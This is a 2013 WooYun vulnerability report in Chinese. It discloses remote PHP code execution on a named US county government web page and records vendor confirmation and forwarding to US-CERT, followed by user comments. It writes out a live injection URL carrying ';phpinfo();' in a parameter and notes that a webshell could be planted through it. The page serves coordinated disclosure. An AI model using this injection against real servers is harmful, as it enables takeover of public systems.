美国一政府漏洞可导致网站沦陷(php代码执行)

漏洞概要

缺陷编号:WooYun-2013-019802

漏洞标题:美国一政府漏洞可导致网站沦陷(php代码执行)

相关厂商:美国一县城政府子站

漏洞作者:hijack

提交时间:2013-03-12 00:15

公开时间:2013-04-24 00:15

漏洞类型:命令执行

危害等级:中

自评Rank:6

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签:

漏洞详情

披露状态:

2013-03-12: 细节已通知厂商并且等待厂商处理中
2013-03-12: 厂商已经确认,细节仅向厂商公开
2013-03-22: 细节向核心白帽子及相关领域专家公开
2013-04-01: 细节向普通白帽子公开
2013-04-11: 细节向实习白帽子公开
2013-04-24: 细节向公众公开

简要描述:

远程执行代码漏洞,可导致服务器沦陷。

详细说明:

http://growth-management.alachua.fl.us/gis/reports/menu.php?id=ImpactFeesReport点击 view reporthttp://growth-management.alachua.fl.us/gis/reports/output.php?id=ImpactFeesReport&month=3&year=2013&fee_type=all&fee_status=all&detail=limited&format=html这个页面可以远程执行代码,如写入一句话木马,进而入侵该服务器。例如:http://growth-management.alachua.fl.us/gis/reports/output.php?id=ImpactFeesReport;phpinfo();&month=3&year=2013&fee_type=all&fee_status=all&detail=limited&format=html

漏洞证明:

点到就好,求个注册邀请码。

修复方案:

代码审查

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-03-12 14:32

厂商回复:

CNVD确认并复现所述情况(可一句话木马),对于是否存在通用软件漏洞还在进一步跟踪,同时向US-CERT发送事件处置邮件。待US-CERT反馈。rank 10

最新状态:

暂无

评价

  1. 2010-01-01 00:00 liner 白帽子 | Rank:145 漏洞数:27)

    这也可以?

  2. 2010-01-01 00:00 苏南同学 白帽子 | Rank:41 漏洞数:5)

    下次我报告一个韩国的,哈哈哈。

  3. 2010-01-01 00:00 http://www.wooyun.org/corps/cncert国家互联网应急中心 白帽子 | Rank:0 漏洞数:0)

    这个有点象通用软件漏洞,不过暂时没看出来。待后续测试。

  4. 2010-01-01 00:00 rqndx 白帽子 | Rank:9 漏洞数:3)

    “漏洞状态:已交由第三方厂商(cncert国家互联网应急中心)处理”有啥用啊

  5. 2010-01-01 00:00 xsser 白帽子 | Rank:152 漏洞数:17)

    @rqndx 会联系美国cert

  6. 2010-01-01 00:00 rqndx 白帽子 | Rank:9 漏洞数:3)

    @xsser 哪里都能见到你啊。。。

  7. 2010-01-01 00:00 possible 白帽子 | Rank:296 漏洞数:31)

    开始走向国际化了呀

  8. 2010-01-01 00:00 廖子颉 白帽子 | Rank:52 漏洞数:5)

    @cncert国家互联网应急中心 对于美国你只有拿英文通知....如果我报一个日本的呢?

  9. 2010-01-01 00:00 乐乐、 白帽子 | Rank:528 漏洞数:57)

    可以报 美国的? 菲律宾呢?

  10. 2010-01-01 00:00 isno 白帽子 | Rank:20 漏洞数:3)

    美国说全球41%的网络攻击来源于中国,是不是都是你们干的?